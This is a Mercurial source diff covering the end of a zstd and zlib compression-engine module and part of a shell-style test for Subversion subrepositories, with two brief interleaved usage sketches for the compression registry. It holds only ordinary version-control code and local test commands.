3689 z = self._cctx.compressobj()
3690 z = self._cctx.compressobj()
3690 chunks = []
3691 chunks = []
3691 pos = 0
3692 pos = 0
3692 while pos < insize:
3693 while pos < insize:
3693 pos2 = pos + self._compinsize
3694 pos2 = pos + self._compinsize
3694 chunk = z.compress(data[pos:pos2])
3695 chunk = z.compress(data[pos:pos2])
3695 if chunk:
3696 if chunk:
3696 chunks.append(chunk)
3697 chunks.append(chunk)
3697 pos = pos2
3698 pos = pos2
3698 chunks.append(z.flush())
3699 chunks.append(z.flush())
3699
3700
3700 if sum(map(len, chunks)) < insize:
3701 if sum(map(len, chunks)) < insize:
3701 return ''.join(chunks)
3702 return ''.join(chunks)
3702 return None
3703 return None
3703
3704
3704 def decompress(self, data):
3705 def decompress(self, data):
3705 insize = len(data)
3706 insize = len(data)
3706
3707
3707 try:
3708 try:
3708 # This was measured to be faster than other streaming
3709 # This was measured to be faster than other streaming
3709 # decompressors.
3710 # decompressors.
3710 dobj = self._dctx.decompressobj()
3711 dobj = self._dctx.decompressobj()
3711 chunks = []
3712 chunks = []
3712 pos = 0
3713 pos = 0
3713 while pos < insize:
3714 while pos < insize:
3714 pos2 = pos + self._decompinsize
3715 pos2 = pos + self._decompinsize
3715 chunk = dobj.decompress(data[pos:pos2])
3716 chunk = dobj.decompress(data[pos:pos2])
3716 if chunk:
3717 if chunk:
3717 chunks.append(chunk)
3718 chunks.append(chunk)
3718 pos = pos2
3719 pos = pos2
3719 # Frame should be exhausted, so no finish() API.
3720 # Frame should be exhausted, so no finish() API.
3720
3721
3721 return ''.join(chunks)
3722 return ''.join(chunks)
3722 except Exception as e:
3723 except Exception as e:
3723 raise error.RevlogError(_('revlog decompress error: %s') %
3724 raise error.RevlogError(_('revlog decompress error: %s') %
3724 str(e))
3725 str(e))
3725
3726
3726 def revlogcompressor(self, opts=None):
3727 def revlogcompressor(self, opts=None):
3727 opts = opts or {}
3728 opts = opts or {}
3728 return self.zstdrevlogcompressor(self._module,
3729 return self.zstdrevlogcompressor(self._module,
3729 level=opts.get('level', 3))
3730 level=opts.get('level', 3))
3730
3731
3731 compengines.register(_zstdengine())
3732 compengines.register(_zstdengine())
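
A short usage sketch, assuming only the registry shown in this module:
prefer zstd when the optional module is importable, otherwise fall back
to the always-available zlib engine.

    def preferredengine():
        zstd = compengines['zstd']
        if zstd.available():
            return zstd
        return compengines['zlib']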
3732
3733
3733 def bundlecompressiontopics():
3734 def bundlecompressiontopics():
3734 """Obtains a list of available bundle compressions for use in help."""
3735 """Obtains a list of available bundle compressions for use in help."""
3735 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3736 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3736 items = {}
3737 items = {}
3737
3738
3738 # We need to format the docstring. So use a dummy object/type to hold it
3739 # We need to format the docstring. So use a dummy object/type to hold it
3739 # rather than mutating the original.
3740 # rather than mutating the original.
3740 class docobject(object):
3741 class docobject(object):
3741 pass
3742 pass
3742
3743
3743 for name in compengines:
3744 for name in compengines:
3744 engine = compengines[name]
3745 engine = compengines[name]
3745
3746
3746 if not engine.available():
3747 if not engine.available():
3747 continue
3748 continue
3748
3749
3749 bt = engine.bundletype()
3750 bt = engine.bundletype()
3750 if not bt or not bt[0]:
3751 if not bt or not bt[0]:
3751 continue
3752 continue
3752
3753
3753 doc = pycompat.sysstr('``%s``\n %s') % (
3754 doc = pycompat.sysstr('``%s``\n %s') % (
3754 bt[0], engine.bundletype.__doc__)
3755 bt[0], engine.bundletype.__doc__)
3755
3756
3756 value = docobject()
3757 value = docobject()
3757 value.__doc__ = doc
3758 value.__doc__ = doc
3758
3759
3759 items[bt[0]] = value
3760 items[bt[0]] = value
3760
3761
3761 return items
3762 return items
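
A small consumer sketch for the helper above: print the first line of
each formatted docstring, one per available bundle compression.

    for name, item in sorted(bundlecompressiontopics().items()):
        # each __doc__ begins with the '``name``' line built above
        print item.__doc__.splitlines()[0]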
3762
3763
3763 # convenient shortcut
3764 # convenient shortcut
3764 dst = debugstacktrace
3765 dst = debugstacktrace
@@ -1,641 +1,705 b''
1 #require svn15
1 #require svn15
2
2
3 $ SVNREPOPATH=`pwd`/svn-repo
3 $ SVNREPOPATH=`pwd`/svn-repo
4 #if windows
4 #if windows
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
6 #else
6 #else
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
8 #endif
8 #endif
9
9
10 $ filter_svn_output () {
10 $ filter_svn_output () {
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
12 > }
12 > }
13
13
14 create subversion repo
14 create subversion repo
15
15
16 $ WCROOT="`pwd`/svn-wc"
16 $ WCROOT="`pwd`/svn-wc"
17 $ svnadmin create svn-repo
17 $ svnadmin create svn-repo
18 $ svn co "$SVNREPOURL" svn-wc
18 $ svn co "$SVNREPOURL" svn-wc
19 Checked out revision 0.
19 Checked out revision 0.
20 $ cd svn-wc
20 $ cd svn-wc
21 $ mkdir src
21 $ mkdir src
22 $ echo alpha > src/alpha
22 $ echo alpha > src/alpha
23 $ svn add src
23 $ svn add src
24 A src
24 A src
25 A src/alpha (glob)
25 A src/alpha (glob)
26 $ mkdir externals
26 $ mkdir externals
27 $ echo other > externals/other
27 $ echo other > externals/other
28 $ svn add externals
28 $ svn add externals
29 A externals
29 A externals
30 A externals/other (glob)
30 A externals/other (glob)
31 $ svn ci -qm 'Add alpha'
31 $ svn ci -qm 'Add alpha'
32 $ svn up -q
32 $ svn up -q
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
34 $ svn propset -F extdef svn:externals src
34 $ svn propset -F extdef svn:externals src
35 property 'svn:externals' set on 'src'
35 property 'svn:externals' set on 'src'
36 $ svn ci -qm 'Setting externals'
36 $ svn ci -qm 'Setting externals'
37 $ cd ..
37 $ cd ..
38
38
39 create hg repo
39 create hg repo
40
40
41 $ mkdir sub
41 $ mkdir sub
42 $ cd sub
42 $ cd sub
43 $ hg init t
43 $ hg init t
44 $ cd t
44 $ cd t
45
45
46 first revision, no sub
46 first revision, no sub
47
47
48 $ echo a > a
48 $ echo a > a
49 $ hg ci -Am0
49 $ hg ci -Am0
50 adding a
50 adding a
51
51
52 add first svn sub with leading whitespaces
52 add first svn sub with leading whitespaces
53
53
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
56 $ svn co --quiet "$SVNREPOURL"/src s
56 $ svn co --quiet "$SVNREPOURL"/src s
57 $ mkdir subdir
57 $ mkdir subdir
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
59 $ hg add .hgsub
59 $ hg add .hgsub
60 $ hg ci -m1
60 $ hg ci -m1
61
61
62 make sure we avoid empty commits (issue2445)
62 make sure we avoid empty commits (issue2445)
63
63
64 $ hg sum
64 $ hg sum
65 parent: 1:* tip (glob)
65 parent: 1:* tip (glob)
66 1
66 1
67 branch: default
67 branch: default
68 commit: (clean)
68 commit: (clean)
69 update: (current)
69 update: (current)
70 phases: 2 draft
70 phases: 2 draft
71 $ hg ci -moops
71 $ hg ci -moops
72 nothing changed
72 nothing changed
73 [1]
73 [1]
74
74
75 debugsub
75 debugsub
76
76
77 $ hg debugsub
77 $ hg debugsub
78 path s
78 path s
79 source file://*/svn-repo/src (glob)
79 source file://*/svn-repo/src (glob)
80 revision 2
80 revision 2
81 path subdir/s
81 path subdir/s
82 source file://*/svn-repo/src (glob)
82 source file://*/svn-repo/src (glob)
83 revision 2
83 revision 2
84
84
85 change file in svn and hg, commit
85 change file in svn and hg, commit
86
86
87 $ echo a >> a
87 $ echo a >> a
88 $ echo alpha >> s/alpha
88 $ echo alpha >> s/alpha
89 $ hg sum
89 $ hg sum
90 parent: 1:* tip (glob)
90 parent: 1:* tip (glob)
91 1
91 1
92 branch: default
92 branch: default
93 commit: 1 modified, 1 subrepos
93 commit: 1 modified, 1 subrepos
94 update: (current)
94 update: (current)
95 phases: 2 draft
95 phases: 2 draft
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
97 committing subrepository s
97 committing subrepository s
98 Sending*s/alpha (glob)
98 Sending*s/alpha (glob)
99 Committed revision 3.
99 Committed revision 3.
100 Fetching external item into '*s/externals'* (glob)
100 Fetching external item into '*s/externals'* (glob)
101 External at revision 1.
101 External at revision 1.
102 At revision 3.
102 At revision 3.
103 $ hg debugsub
103 $ hg debugsub
104 path s
104 path s
105 source file://*/svn-repo/src (glob)
105 source file://*/svn-repo/src (glob)
106 revision 3
106 revision 3
107 path subdir/s
107 path subdir/s
108 source file://*/svn-repo/src (glob)
108 source file://*/svn-repo/src (glob)
109 revision 2
109 revision 2
110
110
111 missing svn file, commit should fail
111 missing svn file, commit should fail
112
112
113 $ rm s/alpha
113 $ rm s/alpha
114 $ hg commit --subrepos -m 'abort on missing file'
114 $ hg commit --subrepos -m 'abort on missing file'
115 committing subrepository s
115 committing subrepository s
116 abort: cannot commit missing svn entries (in subrepo s)
116 abort: cannot commit missing svn entries (in subrepo s)
117 [255]
117 [255]
118 $ svn revert s/alpha > /dev/null
118 $ svn revert s/alpha > /dev/null
119
119
120 add an unrelated revision in svn and update the subrepo without
120 add an unrelated revision in svn and update the subrepo without
121 bringing in any changes.
121 bringing in any changes.
122
122
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
124 $ svn up -q s
124 $ svn up -q s
125 $ hg sum
125 $ hg sum
126 parent: 2:* tip (glob)
126 parent: 2:* tip (glob)
127 Message!
127 Message!
128 branch: default
128 branch: default
129 commit: (clean)
129 commit: (clean)
130 update: (current)
130 update: (current)
131 phases: 3 draft
131 phases: 3 draft
132
132
133 $ echo a > s/a
133 $ echo a > s/a
134
134
135 should be empty despite change to s/a
135 should be empty despite change to s/a
136
136
137 $ hg st
137 $ hg st
138
138
139 add a commit from svn
139 add a commit from svn
140
140
141 $ cd "$WCROOT/src"
141 $ cd "$WCROOT/src"
142 $ svn up -q
142 $ svn up -q
143 $ echo xyz >> alpha
143 $ echo xyz >> alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
145 property 'svn:mime-type' set on 'alpha'
145 property 'svn:mime-type' set on 'alpha'
146 $ svn ci -qm 'amend a from svn'
146 $ svn ci -qm 'amend a from svn'
147 $ cd ../../sub/t
147 $ cd ../../sub/t
148
148
149 this commit from hg will fail
149 this commit from hg will fail
150
150
151 $ echo zzz >> s/alpha
151 $ echo zzz >> s/alpha
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
153 committing subrepository s
153 committing subrepository s
154 abort: svn:*Commit failed (details follow): (glob)
154 abort: svn:*Commit failed (details follow): (glob)
155 [255]
155 [255]
156 $ svn revert -q s/alpha
156 $ svn revert -q s/alpha
157
157
158 this commit fails because of meta changes
158 this commit fails because of meta changes
159
159
160 $ svn propset svn:mime-type 'text/html' s/alpha
160 $ svn propset svn:mime-type 'text/html' s/alpha
161 property 'svn:mime-type' set on 's/alpha' (glob)
161 property 'svn:mime-type' set on 's/alpha' (glob)
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
163 committing subrepository s
163 committing subrepository s
164 abort: svn:*Commit failed (details follow): (glob)
164 abort: svn:*Commit failed (details follow): (glob)
165 [255]
165 [255]
166 $ svn revert -q s/alpha
166 $ svn revert -q s/alpha
167
167
168 this commit fails because of externals changes
168 this commit fails because of externals changes
169
169
170 $ echo zzz > s/externals/other
170 $ echo zzz > s/externals/other
171 $ hg ci --subrepos -m 'amend externals from hg'
171 $ hg ci --subrepos -m 'amend externals from hg'
172 committing subrepository s
172 committing subrepository s
173 abort: cannot commit svn externals (in subrepo s)
173 abort: cannot commit svn externals (in subrepo s)
174 [255]
174 [255]
175 $ hg diff --subrepos -r 1:2 | grep -v diff
175 $ hg diff --subrepos -r 1:2 | grep -v diff
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
178 @@ -1,2 +1,2 @@
178 @@ -1,2 +1,2 @@
179 -2 s
179 -2 s
180 +3 s
180 +3 s
181 2 subdir/s
181 2 subdir/s
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
184 @@ -1,1 +1,2 @@
184 @@ -1,1 +1,2 @@
185 a
185 a
186 +a
186 +a
187 $ svn revert -q s/externals/other
187 $ svn revert -q s/externals/other
188
188
189 this commit fails because of externals meta changes
189 this commit fails because of externals meta changes
190
190
191 $ svn propset svn:mime-type 'text/html' s/externals/other
191 $ svn propset svn:mime-type 'text/html' s/externals/other
192 property 'svn:mime-type' set on 's/externals/other' (glob)
192 property 'svn:mime-type' set on 's/externals/other' (glob)
193 $ hg ci --subrepos -m 'amend externals from hg'
193 $ hg ci --subrepos -m 'amend externals from hg'
194 committing subrepository s
194 committing subrepository s
195 abort: cannot commit svn externals (in subrepo s)
195 abort: cannot commit svn externals (in subrepo s)
196 [255]
196 [255]
197 $ svn revert -q s/externals/other
197 $ svn revert -q s/externals/other
198
198
199 clone
199 clone
200
200
201 $ cd ..
201 $ cd ..
202 $ hg clone t tc
202 $ hg clone t tc
203 updating to branch default
203 updating to branch default
204 A tc/s/alpha (glob)
204 A tc/s/alpha (glob)
205 U tc/s (glob)
205 U tc/s (glob)
206
206
207 Fetching external item into 'tc/s/externals'* (glob)
207 Fetching external item into 'tc/s/externals'* (glob)
208 A tc/s/externals/other (glob)
208 A tc/s/externals/other (glob)
209 Checked out external at revision 1.
209 Checked out external at revision 1.
210
210
211 Checked out revision 3.
211 Checked out revision 3.
212 A tc/subdir/s/alpha (glob)
212 A tc/subdir/s/alpha (glob)
213 U tc/subdir/s (glob)
213 U tc/subdir/s (glob)
214
214
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
216 A tc/subdir/s/externals/other (glob)
216 A tc/subdir/s/externals/other (glob)
217 Checked out external at revision 1.
217 Checked out external at revision 1.
218
218
219 Checked out revision 2.
219 Checked out revision 2.
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
221 $ cd tc
221 $ cd tc
222
222
223 debugsub in clone
223 debugsub in clone
224
224
225 $ hg debugsub
225 $ hg debugsub
226 path s
226 path s
227 source file://*/svn-repo/src (glob)
227 source file://*/svn-repo/src (glob)
228 revision 3
228 revision 3
229 path subdir/s
229 path subdir/s
230 source file://*/svn-repo/src (glob)
230 source file://*/svn-repo/src (glob)
231 revision 2
231 revision 2
232
232
233 verify subrepo is contained within the repo directory
233 verify subrepo is contained within the repo directory
234
234
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
236 True
236 True
237
237
238 update to nullrev (must delete the subrepo)
238 update to nullrev (must delete the subrepo)
239
239
240 $ hg up null
240 $ hg up null
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
242 $ ls
242 $ ls
243
243
244 Check hg update --clean
244 Check hg update --clean
245 $ cd "$TESTTMP/sub/t"
245 $ cd "$TESTTMP/sub/t"
246 $ cd s
246 $ cd s
247 $ echo c0 > alpha
247 $ echo c0 > alpha
248 $ echo c1 > f1
248 $ echo c1 > f1
249 $ echo c1 > f2
249 $ echo c1 > f2
250 $ svn add f1 -q
250 $ svn add f1 -q
251 $ svn status | sort
251 $ svn status | sort
252
252
253 ? * a (glob)
253 ? * a (glob)
254 ? * f2 (glob)
254 ? * f2 (glob)
255 A * f1 (glob)
255 A * f1 (glob)
256 M * alpha (glob)
256 M * alpha (glob)
257 Performing status on external item at 'externals'* (glob)
257 Performing status on external item at 'externals'* (glob)
258 X * externals (glob)
258 X * externals (glob)
259 $ cd ../..
259 $ cd ../..
260 $ hg -R t update -C
260 $ hg -R t update -C
261
261
262 Fetching external item into 't/s/externals'* (glob)
262 Fetching external item into 't/s/externals'* (glob)
263 Checked out external at revision 1.
263 Checked out external at revision 1.
264
264
265 Checked out revision 3.
265 Checked out revision 3.
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
267 $ cd t/s
267 $ cd t/s
268 $ svn status | sort
268 $ svn status | sort
269
269
270 ? * a (glob)
270 ? * a (glob)
271 ? * f1 (glob)
271 ? * f1 (glob)
272 ? * f2 (glob)
272 ? * f2 (glob)
273 Performing status on external item at 'externals'* (glob)
273 Performing status on external item at 'externals'* (glob)
274 X * externals (glob)
274 X * externals (glob)
275
275
276 Sticky subrepositories, no changes
276 Sticky subrepositories, no changes
277 $ cd "$TESTTMP/sub/t"
277 $ cd "$TESTTMP/sub/t"
278 $ hg id -n
278 $ hg id -n
279 2
279 2
280 $ cd s
280 $ cd s
281 $ svnversion
281 $ svnversion
282 3
282 3
283 $ cd ..
283 $ cd ..
284 $ hg update 1
284 $ hg update 1
285 U *s/alpha (glob)
285 U *s/alpha (glob)
286
286
287 Fetching external item into '*s/externals'* (glob)
287 Fetching external item into '*s/externals'* (glob)
288 Checked out external at revision 1.
288 Checked out external at revision 1.
289
289
290 Checked out revision 2.
290 Checked out revision 2.
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
292 $ hg id -n
292 $ hg id -n
293 1
293 1
294 $ cd s
294 $ cd s
295 $ svnversion
295 $ svnversion
296 2
296 2
297 $ cd ..
297 $ cd ..
298
298
299 Sticky subrepositories, file changes
299 Sticky subrepositories, file changes
300 $ touch s/f1
300 $ touch s/f1
301 $ cd s
301 $ cd s
302 $ svn add f1
302 $ svn add f1
303 A f1
303 A f1
304 $ cd ..
304 $ cd ..
305 $ hg id -n
305 $ hg id -n
306 1+
306 1+
307 $ cd s
307 $ cd s
308 $ svnversion
308 $ svnversion
309 2M
309 2M
310 $ cd ..
310 $ cd ..
311 $ hg update tip
311 $ hg update tip
312 subrepository s diverged (local revision: 2, remote revision: 3)
312 subrepository s diverged (local revision: 2, remote revision: 3)
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
314 subrepository sources for s differ
314 subrepository sources for s differ
315 use (l)ocal source (2) or (r)emote source (3)? l
315 use (l)ocal source (2) or (r)emote source (3)? l
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 $ hg id -n
317 $ hg id -n
318 2+
318 2+
319 $ cd s
319 $ cd s
320 $ svnversion
320 $ svnversion
321 2M
321 2M
322 $ cd ..
322 $ cd ..
323 $ hg update --clean tip
323 $ hg update --clean tip
324 U *s/alpha (glob)
324 U *s/alpha (glob)
325
325
326 Fetching external item into '*s/externals'* (glob)
326 Fetching external item into '*s/externals'* (glob)
327 Checked out external at revision 1.
327 Checked out external at revision 1.
328
328
329 Checked out revision 3.
329 Checked out revision 3.
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
331
331
332 Sticky subrepository, revision updates
332 Sticky subrepository, revision updates
333 $ hg id -n
333 $ hg id -n
334 2
334 2
335 $ cd s
335 $ cd s
336 $ svnversion
336 $ svnversion
337 3
337 3
338 $ cd ..
338 $ cd ..
339 $ cd s
339 $ cd s
340 $ svn update -qr 1
340 $ svn update -qr 1
341 $ cd ..
341 $ cd ..
342 $ hg update 1
342 $ hg update 1
343 subrepository s diverged (local revision: 3, remote revision: 2)
343 subrepository s diverged (local revision: 3, remote revision: 2)
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
345 subrepository sources for s differ (in checked out version)
345 subrepository sources for s differ (in checked out version)
346 use (l)ocal source (1) or (r)emote source (2)? l
346 use (l)ocal source (1) or (r)emote source (2)? l
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
348 $ hg id -n
348 $ hg id -n
349 1+
349 1+
350 $ cd s
350 $ cd s
351 $ svnversion
351 $ svnversion
352 1
352 1
353 $ cd ..
353 $ cd ..
354
354
355 Sticky subrepository, file changes and revision updates
355 Sticky subrepository, file changes and revision updates
356 $ touch s/f1
356 $ touch s/f1
357 $ cd s
357 $ cd s
358 $ svn add f1
358 $ svn add f1
359 A f1
359 A f1
360 $ svnversion
360 $ svnversion
361 1M
361 1M
362 $ cd ..
362 $ cd ..
363 $ hg id -n
363 $ hg id -n
364 1+
364 1+
365 $ hg update tip
365 $ hg update tip
366 subrepository s diverged (local revision: 3, remote revision: 3)
366 subrepository s diverged (local revision: 3, remote revision: 3)
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
368 subrepository sources for s differ
368 subrepository sources for s differ
369 use (l)ocal source (1) or (r)emote source (3)? l
369 use (l)ocal source (1) or (r)emote source (3)? l
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
371 $ hg id -n
371 $ hg id -n
372 2+
372 2+
373 $ cd s
373 $ cd s
374 $ svnversion
374 $ svnversion
375 1M
375 1M
376 $ cd ..
376 $ cd ..
377
377
378 Sticky repository, update --clean
378 Sticky repository, update --clean
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
380 U *s/alpha (glob)
380 U *s/alpha (glob)
381 U *s (glob)
381 U *s (glob)
382
382
383 Fetching external item into '*s/externals'* (glob)
383 Fetching external item into '*s/externals'* (glob)
384 Checked out external at revision 1.
384 Checked out external at revision 1.
385
385
386 Checked out revision 3.
386 Checked out revision 3.
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
388 $ hg id -n
388 $ hg id -n
389 2
389 2
390 $ cd s
390 $ cd s
391 $ svnversion
391 $ svnversion
392 3
392 3
393 $ cd ..
393 $ cd ..
394
394
395 Test subrepo already at intended revision:
395 Test subrepo already at intended revision:
396 $ cd s
396 $ cd s
397 $ svn update -qr 2
397 $ svn update -qr 2
398 $ cd ..
398 $ cd ..
399 $ hg update 1
399 $ hg update 1
400 subrepository s diverged (local revision: 3, remote revision: 2)
400 subrepository s diverged (local revision: 3, remote revision: 2)
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
403 $ hg id -n
403 $ hg id -n
404 1+
404 1+
405 $ cd s
405 $ cd s
406 $ svnversion
406 $ svnversion
407 2
407 2
408 $ cd ..
408 $ cd ..
409
409
410 Test case where subversion would fail to update the subrepo because there
410 Test case where subversion would fail to update the subrepo because there
411 are unknown directories being replaced by tracked ones (happens with rebase).
411 are unknown directories being replaced by tracked ones (happens with rebase).
412
412
413 $ cd "$WCROOT/src"
413 $ cd "$WCROOT/src"
414 $ mkdir dir
414 $ mkdir dir
415 $ echo epsilon.py > dir/epsilon.py
415 $ echo epsilon.py > dir/epsilon.py
416 $ svn add dir
416 $ svn add dir
417 A dir
417 A dir
418 A dir/epsilon.py (glob)
418 A dir/epsilon.py (glob)
419 $ svn ci -qm 'Add dir/epsilon.py'
419 $ svn ci -qm 'Add dir/epsilon.py'
420 $ cd ../..
420 $ cd ../..
421 $ hg init rebaserepo
421 $ hg init rebaserepo
422 $ cd rebaserepo
422 $ cd rebaserepo
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
425 $ hg add .hgsub
425 $ hg add .hgsub
426 $ hg ci -m addsub
426 $ hg ci -m addsub
427 $ echo a > a
427 $ echo a > a
428 $ hg add .
428 $ hg add .
429 adding a
429 adding a
430 $ hg ci -m adda
430 $ hg ci -m adda
431 $ hg up 0
431 $ hg up 0
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
433 $ svn up -qr6 s
433 $ svn up -qr6 s
434 $ hg ci -m updatesub
434 $ hg ci -m updatesub
435 created new head
435 created new head
436 $ echo pyc > s/dir/epsilon.pyc
436 $ echo pyc > s/dir/epsilon.pyc
437 $ hg up 1
437 $ hg up 1
438 D *s/dir (glob)
438 D *s/dir (glob)
439
439
440 Fetching external item into '*s/externals'* (glob)
440 Fetching external item into '*s/externals'* (glob)
441 Checked out external at revision 1.
441 Checked out external at revision 1.
442
442
443 Checked out revision 5.
443 Checked out revision 5.
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
445 $ hg up -q 2
445 $ hg up -q 2
446
446
447 Modify one of the externals to point to a different path so we can
447 Modify one of the externals to point to a different path so we can
448 test having obstructions when switching branches on checkout:
448 test having obstructions when switching branches on checkout:
449 $ hg checkout tip
449 $ hg checkout tip
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
453 $ hg commit -m 'Start making obstructed working copy'
453 $ hg commit -m 'Start making obstructed working copy'
454 $ hg book other
454 $ hg book other
455 $ hg co -r 'p1(tip)'
455 $ hg co -r 'p1(tip)'
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
457 (leaving bookmark other)
457 (leaving bookmark other)
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
460 $ hg commit -m 'Other branch which will be obstructed'
460 $ hg commit -m 'Other branch which will be obstructed'
461 created new head
461 created new head
462
462
463 Switching back to the head where we have another path mapped to the
463 Switching back to the head where we have another path mapped to the
464 same subrepo should work if the subrepo is clean.
464 same subrepo should work if the subrepo is clean.
465 $ hg co other
465 $ hg co other
466 A *obstruct/other (glob)
466 A *obstruct/other (glob)
467 Checked out revision 1.
467 Checked out revision 1.
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
469 (activating bookmark other)
469 (activating bookmark other)
470
470
471 This is surprising, but is also correct based on the current code:
471 This is surprising, but is also correct based on the current code:
472 $ echo "updating should (maybe) fail" > obstruct/other
472 $ echo "updating should (maybe) fail" > obstruct/other
473 $ hg co tip
473 $ hg co tip
474 abort: uncommitted changes
474 abort: uncommitted changes
475 (commit or update --clean to discard changes)
475 (commit or update --clean to discard changes)
476 [255]
476 [255]
477
477
478 Point to a Subversion branch which has since been deleted and recreated
478 Point to a Subversion branch which has since been deleted and recreated
479 First, create that condition in the repository.
479 First, create that condition in the repository.
480
480
481 $ hg ci --subrepos -m cleanup | filter_svn_output
481 $ hg ci --subrepos -m cleanup | filter_svn_output
482 committing subrepository obstruct
482 committing subrepository obstruct
483 Sending obstruct/other (glob)
483 Sending obstruct/other (glob)
484 Committed revision 7.
484 Committed revision 7.
485 At revision 7.
485 At revision 7.
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
